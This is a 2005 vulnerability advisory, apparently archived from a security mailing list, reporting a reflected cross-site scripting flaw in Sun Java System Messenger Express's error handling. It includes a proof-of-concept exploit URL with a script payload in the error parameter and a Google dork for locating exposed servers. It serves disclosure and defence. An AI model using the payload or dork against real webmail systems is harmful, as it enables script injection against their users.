Sun java System Messenger Express XSS
- From: handrix@xxxxxxxxx
- Date: 31 Oct 2006 04:28:45 -0000
Sun java System Messenger Express
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
29 November 2005
MorX security research team
www.morx.org
Description:
Sun java System Messenger Express XSS
The index script is vulnerable to XSS attacks, in function errorHTML .
function errorHTML() {
var s='';
.
.
.
document.write(s) ---> Need more case filetring the 's' var
}
So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
Exploit:
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a>
Googledork :
intitle: "Sun Java(tm) System Messenger Express"
Vulnerable versions :
Sun java System Messenger Express
Sun java System Messenger Express6
- Prev by Date: SQL Injection Vulnerability in bfExplorer 0.0.6
- Next by Date: New Flaw in Firefox 2.0: DoS and possible remote code execution
- Previous by thread: SQL Injection Vulnerability in bfExplorer 0.0.6
- Next by thread: New Flaw in Firefox 2.0: DoS and possible remote code execution
- Index(es):